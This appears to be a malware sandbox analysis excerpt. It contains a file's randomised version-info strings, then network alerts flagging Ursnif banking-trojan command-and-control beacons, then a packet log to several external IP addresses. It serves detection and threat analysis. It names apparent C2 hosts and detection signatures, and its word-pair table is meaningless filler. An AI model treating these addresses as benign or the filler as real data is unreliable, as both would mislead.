Tallness	Helminthological
Physiogenic	Cumaldehyde
Regrettably	Cawk
Gibaro	Unrulily
Gearless	Harpwaytuning
Covisit	Nonascription
Osiered	Symphalangus
Uncinata	Countermission
Pithoegia	Lycus
Unflagitious	Felsophyric
Acrophobia	Virginship
Leptodermous	Stria
Dentification	Semimenstrual
Jumperism	Deuteroconid
Transumption	Classable
Scoptophilic	Snowbreak
Waker	Tarsometatarsal
Sulcation	Metrophotography
Discomforting	Micrander
Disguisedly	Doko
Negus	Chorist
Postamniotic	Vitrotype
Spenerism	Whelked
Hawthorned	Maggy
Unqualifiable	Dermorhynchous
Securiferous	Declivitous
Unsunny	Northeaster
Sawman	Cognizably
Circler	Micrander
Apishamore	Manweed
Kelpie	Pentasepalous
Scalewort	Carabid
Khlysti	Pragmatica
Quadriserial	Rowlet
Gallophobia	Drierman
Polyphylogeny	Theistical
Embolismic	Spitpoison
Wasagara	Superagency
Maggy	Unshielding
Hyracodontidae	Inoglia
Pneumoventriculography	Stupidish
Downfallen	Platyfish
Climber	Clitellar
Archgod	Gymnodinium
Ingress	Dithiobenzoic
Superobjection	Preceptively
Squamate	Seamancraft
Smintheus	Infraspinate
Ectypography	Myoxidae
Separating	Noncirculation
Quincentenary	Dispauperize
Termless	Clambake
Pelecypoda	Soleness
Magnetoprinter	Oxdiacetic
Complect	Placodont
Encephalography	Tarand
Soliloquize	Rockcist
Kor	Waiter
Dereligion	Foveolate
Inky	Rewaybill
Eleventhly	Antisepticist
Debauchment	Coracocostal
Covarecas	Hexamethylene
Blisterweed	Phylloxeric
Pean	Unchallengeableness
Nonacid	Ovism
Suckable	Bettong
PrivateBuild	Carbolate
Unspewed	Transfusionist
Spikelike	Karyaster
Perisinuitis	Combaron
Argestes	Viburnin
Gemination	Younger
Skellum	Triphasic
Ramus	Vaccenic
Depeople	Psorosis
Abolitionize	Tonometer
Ministeriality	Khar
Saguerus	Twat
Tiddy	Taborin
Prestruggle	Greeter
Conscienceless	Beray
Threskiornithinae	Crabman
Negrolike	Protogonous
Disbeliever	Sinuately
Helicidae	Bedrop
Nuggety	Recomplaint
Silverspot	Viscounty
Interlacery	Melanconiaceae
Sartorially	Tankless
Tenent	Pelecypoda
Intertwinement	Parmeliaceous
Semicomplicated	Plugman
Labioalveolar	Codheaded
Indefeatable	Diacranteric
Unpardonable	Hammerdress
Otodynic	Zein
Esmeraldan	Stalactitic
Mezzograph	Amorality
Fritillaria	Anthropocentrism
Virgulariidae	Hypermetabolism
Capsulation	Iloko
OriginalFilename	Wartless
Bribegiver	Thiohydrate
Quietly	Manganic
Smokejack	Antirevolutionary
Needsome	Epicele
Seljuk	Sciarid
Gorgonian	Undiminishably
Roker	Cumulately
Choromania	Drupaceous
Krasis	Overlighted
Tubboe	Collingual
Hacker	Cephalalgy
Missiness	Medalet
Irrotational	Inbreather
Jumbuck	Subcontiguous
Innet	Brandyball
Overholy	Seismogram
Theistical	Catasarka
Tridynamous	Sutherlandia
Andrias	Deutencephalon
Preinsinuative	Unbotanical
Bung	Octosporous
Cheremissian	Ontogenically
Orthodiagraph	Stutterer
Divulgence	Lomentariaceous
Disoccupy	Moraceae
Exclusivism	Uncompanied
Scrutatory	Shoplet
Hake	Incohering
Sendee	Protopathic
Aortectasia	Sandastros
Heliolitidae	Misintelligible
Cellated	Helicotrema
Searchableness	Fluidization
Unfishable	Fiscalize
Reascensional	Unwasteful
Wellsian	Fitted
Encephalodialysis	Counterimagination
Typhlopexia	Uncompanied
Squillid	Psilotaceae
Eyen	Resazurin
Antapology	Sacramentalist
Stigmatizer	Meliphagidan
Organozinc	Atavic
Gyne	Dorsiparous
Walkmill	Potamobiidae
Phora	Agla
Unofficerlike	Mazuma
Insensately	Redemptress
Lazarlike	Anthropomorphology
Pulpstone	Fibrocyst
Palamate	Stalactitic
Vatteluttu	Diatonically
Sprigtail	Alupag
Anargyros	Signary
Daff	Turveydrop
Deletory	Rullion
Canacee	Kottigite
Catholicity	Nother
Extrafascicular	Caderas
Clavel	Unbedashed
Nignay	Agonal
Awhet	Demonstrator
Bookward	Motivelessness
Psychoreflex	Butoxy
Unretrenched	Stria
Phraseogram	Salaryless
Dullpate	Coleslaw
Enhydra	Hemoglobinocholia
Dehydrocorydaline	Antisepticist
Butenyl	Installer
Unconfined	Rachialgia
Everydayness	Angularly
Stalactitic	Prehandle
Hoarseness	Flauntily
Prepersuasion	Suckstone
Paraphrastic	Coprolite
Solidistic	Unenrichableness
Stymphalides	Countermotion
Quaintly	Equivocatory
Berzelianite	Ricker
Imaginous	Plaintiveness
Vertebrarterial	Mortalist
Porphyrean	Oscurrantist
Sourceful	Multiloquous
Transplendently	Wizened
Myringoplasty	Unimpelled
Snowk	Dermography
Ductileness	Unbarred
Derivedly	Nonpassenger
Heathery	Griffinhood
Meretriciously	Transverseness
Endopathic	Reshuttle
Hunchakist	Transverseness
Jabberment	Eulamellibranch
Omniparient	Cellated
Hypoazoturia	Salmwood
Shivaite	Lovelock
Subterraneously	Saccomyian
Zootomical	Churchward
Bradyphemia	Aalii
Disprison	Martyrologic
Scalder	Snying
Racketer	Corrugated
Faldstool	Showmanry
Tsarship	Acetylcarbazole
Benzolize	Japanize
Caderas	Spurwinged
Theophagy	Antapology
Wrecky	Ramellose
Coinhabit	Grammatite
Inventively	Orontium
Streetward	Hyperscholastic
Arpeggiated	Washed
Overmast	Pecked
Hingeflower	Chudic
Velocipedean	Butenyl
Turpantineweed	Cocreditor
Uirina	Lacerability
Formulist	Brough
Mosaicism	Gyniatry
Mortalist	Colauxe
Sulphoncyanine	Iloko
Equiproportionality	Spirally
Pachypterous	Erewhile
Unconsecutive	Lymphoprotease
Harpwaytuning	Aplacental
Lowth	Spelk
Wist	Casimiroa
Abdominous	Prisondom
Scoliosis	Pinkeye
Firebrat	Partible
Nonsensification	Catholicon
Axweed	Tenent
Birthmate	Uncradled
Reliction	Gyniatry
Cumberer	Tettigoniid
Salaryless	Pyrroporphyrin
Stylistically	Scorningly
Jarring	Teleoroentgenography
Noctiflorous	Gastrothecal
Unreproving	Gypsophily
Googly	Myoxidae
Dorsiduct	Subgalea
Antennula	Acosmistic
Tailflower	Gaspar
Twister	Invocator
Lachrymonasal	Protomala
Stereoelectric	Senilely
Palaeocene	Staverwort
Antidetonant	Falsification
Recidivation	Tartronate
Diplonema	Enslavedness
Scientificopoetic	Tailage
Whapuka	Lithiastic
Eutrophic	Womanfolk
Irrepealable	Nonconformist
Palaeolithoid	Concorrezanes
Onchocerciasis	Berther
Corky	Palsification
Astrut	Gyniatry
Paleoceanography	Wasagara
Introspectivism	Momism
Sociography	Jumperism
Cephalalgy	Duumviral
Coassist	Conventionally
Nonsubsiding	Dorsobranchiata
Nonsaving	Ea
Hist	Macleaya
Uncomprised	Wryly
Lobed	Conventionally
Suprathoracic	Belay
Indivertibly	Tangently
Allonymous	Borborygmus
Cloisterer	Hypermetabolism
Legislator	Concorrezanes
Gorlois	Flatulence
Thinking	Unpatronized
Babyishness	Thigmotaxis
Rookery	Gingerness
Borning	Zoophytish
Greekless	Toxiferous
Scotticize	Unstentorian
Emesis	Punct
Infusoria	Unsuccored
Pterygiophore	Prochronic
Punct	Refreshant
Coronal	Propendent
Laparonephrectomy	Diurnation
Ovism	Cremasteric
Luteinization	Sulphohydrate
Coincidently	Astrodiagnosis
Unfoolable	Balteus
Cincher	Jejunitis
Antithermin	Saccharomycetaceous
Waddling	Boomage
Ununderstandable	Subsultus
Choristate	Oii
Hoary	Annoying
Torsel	Moodishly
Thorniness	Polyphylogeny
Pigflower	Eruditionist
Neoholmia	Ruinable
Nitrostarch	Hemilethargy
Somersetian	Rashful
Hyperadenosis	Plaintiveness
Ringboned	Lepisosteidae
Fisticuffery	Diphtherotoxin
Oxytocous	Dowdyish
Uncradled	Scatula
Tachygrapher	Enthraller
Aalii	Recedent
Joug	Dromaeus
Palpitation	Physostigmine
Fauterer	Boomage
Luminant	Misniac
Chilkat	Dicephalism
Underdrawers	Oscurrantist
Seropuriform	Congressist
Rhombozoa	Flauntily
Flannelmouth	Quinocarbonium
Technicist	Cibory
Caiquejee	Cheremissian
Clitch	Defoliage
Skatosine	Reascensional
Manliness	Paunchful
Escaper	Pyrostat
Tarboy	Tetartoid
Uvulitis	Neurocentrum
Turgoid	Fennoman
Marssonia	Demonry
Surbased	Lagarto
Overfondly	Cerous
Psychoneurological	Entozoology
Corylaceae	Solidly
Unlustily	Loveflower
Laparocolectomy	Tataric
Periplegmatic	Zein
Archigony	Mowrah
Prostatorrhoea	Asynergy
Paedotrophic	Ambagious
Occlusometer	Beray
FileVersion	8, 8, 9, 0
Backwoodsman	Myrmecophobic
Transfusionist	Synchondrotomy
Thigging	Classable
Reappraisement	Shickered
Wrinkleful	Retrohepatic
Telelectric	Preinterpretative
Serfage	Sphaerioidaceae
Infitter	Unofficerlike
Articulately	Kinetogenetic
Fastigiate	Oleocalcareous
Infectant	Premedia
Octosporous	Corol
Counteracquittance	Sarsa
Spiracle	Tath
Corradiate	Unelevated
FileDescription	Paratitles
Unoratorical	Solicited
Throneless	Mazy
Roble	Uploom
Cosmogonal	Typhoonish
Methanometer	Analyzation
Bullnose	Supermoisten
Nonconformist	Unbeaded
Octagonally	Brushwood
Atavic	Chanterelle
Pyoperitonitis	Witlessness
Preseal	Bensel
Palaeonemertinea	Unoared
Empanelment	Aularian
Solidungula	Taplash
Cardiolysis	Counteragency
Dimoric	Astony
Carpoptosis	Reinterest
Helodes	Semibolshevist
Recompilation	Supernecessity
Improviser	Amphiblastula
Redemptress	Antennula
Rewood	Prehandle
Floorman	Conservativeness
Waiter	Princeage
Dacrycystalgia	Berylloid
Oppositious	Overstrain
Affiancer	Musaceous
Ungiven	Autobiographal
Alupag	Ambisporangiate
Madreperl	Unclericalize
Intervisit	Hypomnematic
Silverly	Resale
Chrysophilite	Yarke
Nyctalopy	Mandative
Lycaena	Unexplainedly
Manufacturess	Orgiasm
Dotriacontane	Attractionally
Reseat	Soneri
Unprecedentedness	Cherishing
Meconology	Cynocrambaceous
Unhuzzaed	Euchological
Pulka	Keitloa
Transisthmian	Notaeal
Swiveleyed	Stubbleward
Interportal	Trimellitic
Solicited	Sacker
Scytheman	Coracocostal
Preinstruct	Filelike
Sleekit	Congroid
Epigaea	Triolet
Tettigoniid	Hova
Gelt	Sperable
Pneumatochemical	Thamyras
Armigerous	Penholder
Decrier	Tetramastia
Commodatum	Ilokano
Pitiability	Countersale
Tripeshop	Succedanea
Retraverse	Effulgence
Hysterioid	Recoilingly
Churchish	Unstigmatized
Cardiodysneuria	Decrier
Kittendom	Bilirubinic
Pluvian	Necessar
Aftermark	Levelheadedness
Supineness	Intervital
Putredinous	Semantical
Immovably	Klops
Stormproof	Mosquitobill
Unbefittingness	Schlenter
Spelk	Revisee
Macroplastia	Fluctuant
Votable	Uncleverly
Quiverful	Transequatorial
Incohering	Mercurification
Superindustry	Cocreditor
Mutsuddy	Oversecure
Eleusine	Gallegan
Yest	Unbarred
Archership	Splashingly
Kaolinize	Tequistlatecan
Cassena	Ectodermoidal
CompanyName	Guanaco
Sartorial	Palpebration
Antevert	Dashy
Overexpect	Flippery
Unevinced	Sabiaceae
Cimicid	Naughtily
Ossiculotomy	Overtype
Lyreman	Phlegmatical
Tath	Burut
Suboptimal	Tunnelite
Caffa	Wieldable
Bracing	Stekan
Oversleeve	Ultraliberalism
Strackling	Belittler
Anamnionic	Typothetae
Unhobble	Pickmaw
Overloath	Maxillopremaxillary
Antisepticist	Oversleeve
Shamefacedness	Flourishy
Flatulence	Straitlacing
Tchick	Panoistic
Macleaya	Prosateur
Tetrachordon	Telemetrical
Infortunateness	Progrediency
Herbager	Chemokinetic
Chasmed	Ransel
Trilithic	Melos
Flooder	Characinid
Monopterous	Drifting
Microcythemia	Disemburden
Sprackly	Christocentric
Triolet	Firemanship
Splinterless	Hassocky
Cultirostral	Basiparaplastin
Cibory	Mosaicism
Mote	Phonographic
Anchithere	Undiscording
Guilery	Quaintly
Concurrence	Notopodial
Staurology	Draperied
Notaeal	Fluate
Dioptric	Ropeman
Scrubland	Epidotization
Surculous	Fiscalize
Axmanship	Nonconformist
Translation	0x0409 0x04e4

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/21/22-07:52:33.154789	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49755	80	192.168.2.3	31.41.46.120
01/21/22-07:52:33.156999	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49752	80	192.168.2.3	31.41.46.120
01/21/22-07:52:33.200899	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49756	80	192.168.2.3	31.41.46.120
01/21/22-07:52:33.224863	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49754	80	192.168.2.3	31.41.46.120
01/21/22-07:52:33.373173	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49759	80	192.168.2.3	31.41.46.120
01/21/22-07:53:19.287818	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49798	80	192.168.2.3	192.64.119.233
01/21/22-07:53:19.287818	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49798	80	192.168.2.3	192.64.119.233
01/21/22-07:53:20.714209	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49801	80	192.168.2.3	192.64.119.233
01/21/22-07:53:20.714209	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49801	80	192.168.2.3	192.64.119.233
01/21/22-07:53:20.722322	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49802	80	192.168.2.3	192.64.119.233
01/21/22-07:53:21.753692	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49804	80	192.168.2.3	192.64.119.233
01/21/22-07:53:22.248539	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49812	80	192.168.2.3	198.54.117.218
01/21/22-07:53:22.248539	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49812	80	192.168.2.3	198.54.117.218
01/21/22-07:53:22.270560	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49814	80	192.168.2.3	198.54.117.211
01/21/22-07:53:22.431092	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49813	80	192.168.2.3	198.54.117.211
01/21/22-07:53:22.757134	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49815	80	192.168.2.3	198.54.117.211
01/21/22-07:53:24.126191	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49819	80	192.168.2.3	198.54.117.210
01/21/22-07:53:24.130305	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49817	80	192.168.2.3	198.54.117.210
01/21/22-07:53:24.130305	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49817	80	192.168.2.3	198.54.117.210
01/21/22-07:53:51.879244	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49847	80	192.168.2.3	31.41.46.120
01/21/22-07:53:51.879244	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49847	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.115874	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49848	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.129217	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49850	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.129217	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49850	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.176908	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49849	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.189969	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49851	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.189969	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49851	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.311358	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49854	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.318908	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49856	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.318908	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49856	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.377353	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49855	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.385300	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49857	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.385300	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49857	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.512000	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49861	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.512000	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49861	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.509435	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49858	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.576872	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49859	80	192.168.2.3	31.41.46.120
01/21/22-07:53:53.706053	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49862	80	192.168.2.3	31.41.46.120
01/21/22-07:54:16.363537	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49864	80	192.168.2.3	162.255.119.177
01/21/22-07:54:16.363537	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49864	80	192.168.2.3	162.255.119.177
01/21/22-07:54:20.027969	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49866	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.027969	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49866	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.208185	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49867	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.208185	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49867	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.530349	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49868	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.530349	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49868	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.702386	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49869	80	192.168.2.3	198.54.117.216
01/21/22-07:54:20.702386	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49869	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.035411	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49870	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.035411	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49870	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.206570	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49871	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.206570	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49871	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.547805	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49872	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.547805	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49872	80	192.168.2.3	198.54.117.216
01/21/22-07:54:21.590420	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49879	80	192.168.2.3	162.255.119.177
01/21/22-07:54:21.590420	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49879	80	192.168.2.3	162.255.119.177
01/21/22-07:54:24.476659	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49880	80	192.168.2.3	198.54.117.211
01/21/22-07:54:24.476659	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49880	80	192.168.2.3	198.54.117.211
01/21/22-07:54:44.176512	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49882	80	192.168.2.3	192.64.119.233
01/21/22-07:54:44.176512	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49882	80	192.168.2.3	192.64.119.233
01/21/22-07:54:47.258850	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49883	80	192.168.2.3	198.54.117.212
01/21/22-07:54:47.258850	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49883	80	192.168.2.3	198.54.117.212
01/21/22-07:54:47.639855	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49884	80	192.168.2.3	192.64.119.233
01/21/22-07:54:47.639855	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49884	80	192.168.2.3	192.64.119.233
01/21/22-07:54:50.027799	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49885	80	192.168.2.3	198.54.117.215
01/21/22-07:54:50.027799	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49885	80	192.168.2.3	198.54.117.215
01/21/22-07:55:07.581452	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49886	80	192.168.2.3	31.41.46.120
01/21/22-07:55:07.581452	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49886	80	192.168.2.3	31.41.46.120
01/21/22-07:55:10.371343	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49887	80	192.168.2.3	31.41.46.120
01/21/22-07:55:10.371343	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49887	80	192.168.2.3	31.41.46.120
01/21/22-07:55:18.981075	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49888	80	192.168.2.3	192.64.119.233
01/21/22-07:55:19.304621	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49889	80	192.168.2.3	192.64.119.233
01/21/22-07:55:19.340750	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49890	80	192.168.2.3	198.54.117.210
01/21/22-07:55:19.661740	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49891	80	192.168.2.3	198.54.117.216
01/21/22-07:55:39.651832	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49894	80	192.168.2.3	31.41.46.120
01/21/22-07:55:39.651832	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49894	80	192.168.2.3	31.41.46.120
01/21/22-07:55:40.062399	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49895	80	192.168.2.3	31.41.46.120
01/21/22-07:55:40.062399	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49895	80	192.168.2.3	31.41.46.120

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 21, 2022 07:52:31.567497969 CET	49744	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.567838907 CET	49745	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.627804995 CET	80	49744	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.627966881 CET	49744	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.631757975 CET	80	49745	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.631772995 CET	49744	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.631887913 CET	49745	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.691812038 CET	80	49744	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.692135096 CET	80	49744	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.692205906 CET	49744	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.706974983 CET	49744	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.707668066 CET	49745	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.767529011 CET	80	49744	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.771528006 CET	80	49745	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.771574020 CET	80	49745	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.771672010 CET	49745	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.775500059 CET	49745	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.776485920 CET	49746	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.777260065 CET	49747	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.836086035 CET	80	49746	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.836220980 CET	49746	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.839242935 CET	80	49745	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.840388060 CET	80	49747	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.840504885 CET	49747	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.905735016 CET	49746	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.967286110 CET	80	49746	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.967427015 CET	80	49746	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:31.967530966 CET	49746	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.967710972 CET	49746	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:31.968349934 CET	49747	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.027362108 CET	80	49746	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.032087088 CET	80	49747	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.032128096 CET	80	49747	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.032268047 CET	49747	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.038938999 CET	49747	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.040370941 CET	49748	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.043366909 CET	49749	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.100688934 CET	80	49748	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.100809097 CET	49748	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.101609945 CET	49748	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.101807117 CET	80	49747	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.107114077 CET	80	49749	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.108035088 CET	49749	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.161695004 CET	80	49748	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.161736012 CET	80	49748	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.161824942 CET	49748	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.162203074 CET	49748	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.171870947 CET	49749	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.222075939 CET	80	49748	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.235716105 CET	80	49749	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.235814095 CET	80	49749	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.235977888 CET	49749	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.236067057 CET	49749	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.237864017 CET	49750	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.238197088 CET	49751	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.298777103 CET	80	49750	31.41.46.120	192.168.2.3
